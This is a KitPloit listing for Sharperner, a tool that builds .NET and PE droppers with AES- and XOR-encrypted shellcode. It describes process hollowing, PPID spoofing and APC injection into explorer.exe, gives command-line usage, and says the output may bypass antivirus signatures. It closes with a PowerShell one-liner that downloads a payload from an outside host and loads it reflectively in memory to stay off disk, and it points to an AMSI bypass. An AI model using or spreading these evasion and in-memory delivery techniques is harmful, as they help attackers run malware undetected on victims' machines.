Sharperner - Simple Executable Generator With Encrypted Shellcode

2021-07-06T21:30:00
ID KITPLOIT:6570225666121381917
Type kitploit
Reporter KitPloit
Modified 2021-07-06T21:30:00

Description

Sharperner is a tool written in CSharp that generate .NET dropper with AES and XOR obfuscated shellcode. Generated executable can possibly bypass signature check but I cant be sure it can bypass heuristic scanning.

Features

PE binary

  • Process Hollowing
  • PPID Spoofing
  • Random generated AES key and iv
  • Final Shellcode, Key and IV are translated to morse code :)

.NET binary

  • AES + XOR encrypted shellcode
  • APC Process Injection (explorer.exe)
  • Random function names
  • Random generated AES key and iv
  • Final Shellcode, Key and IV are translated to morse code :)

Usage

/file       B64,hex,raw shellcode  
/type       cs,cpp  
/out        Output file Location (Optional)

Example:  
Sharperner.exe /file:file.txt /type:cpp  
Sharperner.exe /file:file.txt /out:payload.exe

Suggestion

To avoid touching the disk, Generated .NET executable can be loaded reflectively with powershell. AMSI is the enemy now, amsi.fail ftw!

$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')  
$assem = [System.Reflection.Assembly]::Load($data)  
[TotallyNotMal.Program]::Main()

Download Sharperner